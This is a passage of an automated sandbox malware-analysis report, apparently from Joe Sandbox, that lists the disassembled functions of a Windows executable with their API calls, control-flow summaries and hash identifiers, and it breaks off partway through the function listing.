                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$FilePointer
                                                                  • String ID:
                                                                  • API String ID: 1156039329-0
                                                                  • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                  • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                  • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                  • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776
                                                                  Function 0040762C Relevance: 3.0, APIs: 2, Instructions: 30fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 391 40762c-40764a ReadFile 392 407663-40766a 391->392 393 40764c-407650 391->393 394 407652-40765a GetLastError 393->394 395 40765c-40765e call 40748c 393->395 394->392 394->395 395->392
                                                                  APIs
                                                                  • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                  • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastRead
                                                                  • String ID:
                                                                  • API String ID: 1948546556-0
                                                                  • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                  • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                  • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                  • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB
                                                                  Function 004075C4 Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 402 4075c4-4075e5 SetFilePointer 403 4075f7-4075f9 402->403 404 4075e7-4075ee GetLastError 402->404 404->403 405 4075f0-4075f2 call 40748c 404->405 405->403
                                                                  APIs
                                                                  • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                  • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                    • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021703AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$FilePointer
                                                                  • String ID:
                                                                  • API String ID: 1156039329-0
                                                                  • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                  • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                                  • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                  • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                                  Function 00401430 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$AllocFree
                                                                  • String ID:
                                                                  • API String ID: 2087232378-0
                                                                  • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                  • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                  • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                  • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                  Function 00405270 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSystemDefaultLCID.KERNEL32(00000000,004053A6), ref: 0040528F
                                                                    • Part of subcall function 00404CCC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CE9
                                                                    • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: DefaultInfoLoadLocaleStringSystem
                                                                  • String ID:
                                                                  • API String ID: 1658689577-0
                                                                  • Opcode ID: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                  • Instruction ID: 2407abf821673f044c2d0b48b7a4a38d2d1f2757cafa01d062fe92b1f2c090cc
                                                                  • Opcode Fuzzy Hash: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                  • Instruction Fuzzy Hash: 73314D75E0010AABCB00DF95C8C19EEB379FF84304F158977E815BB285E739AE059B98
                                                                  Function 00407576 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                  • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                  • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                  • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                  Function 00407578 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                  • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                  • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                  • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                  Function 004069DC Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                  • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                                  • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                  • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                                  Function 004076C8 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                    • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021703AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastWrite
                                                                  • String ID:
                                                                  • API String ID: 442123175-0
                                                                  • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                  • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                                  • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                  • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                                  Function 00407284 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: FormatMessage
                                                                  • String ID:
                                                                  • API String ID: 1306739567-0
                                                                  • Opcode ID: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                                  • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                                  • Opcode Fuzzy Hash: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                                  • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                                  Function 004076AC Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetEndOfFile.KERNEL32(?,02188000,0040A08C,00000000), ref: 004076B3
                                                                    • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021703AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLast
                                                                  • String ID:
                                                                  • API String ID: 734332943-0
                                                                  • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                  • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                                  • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                  • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                                  Function 00406FFB Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode
                                                                  • String ID:
                                                                  • API String ID: 2340568224-0
                                                                  • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                  • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                                  • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                  • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                                  Function 00407017 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode
                                                                  • String ID:
                                                                  • API String ID: 2340568224-0
                                                                  • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                  • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                                  • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                  • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                                  Function 00406970 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CharPrev
                                                                  • String ID:
                                                                  • API String ID: 122130370-0
                                                                  • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                  • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                  • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                  • Instruction Fuzzy Hash:
                                                                  Function 00407F10 Relevance: 1.3, APIs: 1, Instructions: 62memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                                  • Instruction ID: 20a67eb23ea55951ef5110b519d4bcc97d420124264edb02c1094051c82f9398
                                                                  • Opcode Fuzzy Hash: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                                  • Instruction Fuzzy Hash: D2117571A042059BDB00EF19C881B5B7794AF44359F05807EF958AB3C6DB38EC00CBAA
                                                                  Function 00401658 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: FreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 1263568516-0
                                                                  • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                  • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                  • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                  • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                  Function 00407548 Relevance: 1.3, APIs: 1, Instructions: 20COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandle
                                                                  • String ID:
                                                                  • API String ID: 2962429428-0
                                                                  • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                  • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                  • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                  • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                  Function 00407EB8 Relevance: 1.3, APIs: 1, Instructions: 15COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: FreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 1263568516-0
                                                                  • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                  • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                                  • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                  • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654

                                                                  Non-executed Functions

                                                                  Function 00409448 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41shutdownCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                  • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040949D
                                                                  • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004094A2
                                                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                  • String ID: SeShutdownPrivilege
                                                                  • API String ID: 107509674-3733053543
                                                                  • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                  • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                                  • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                  • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                                  Function 00409BEC Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409BF6
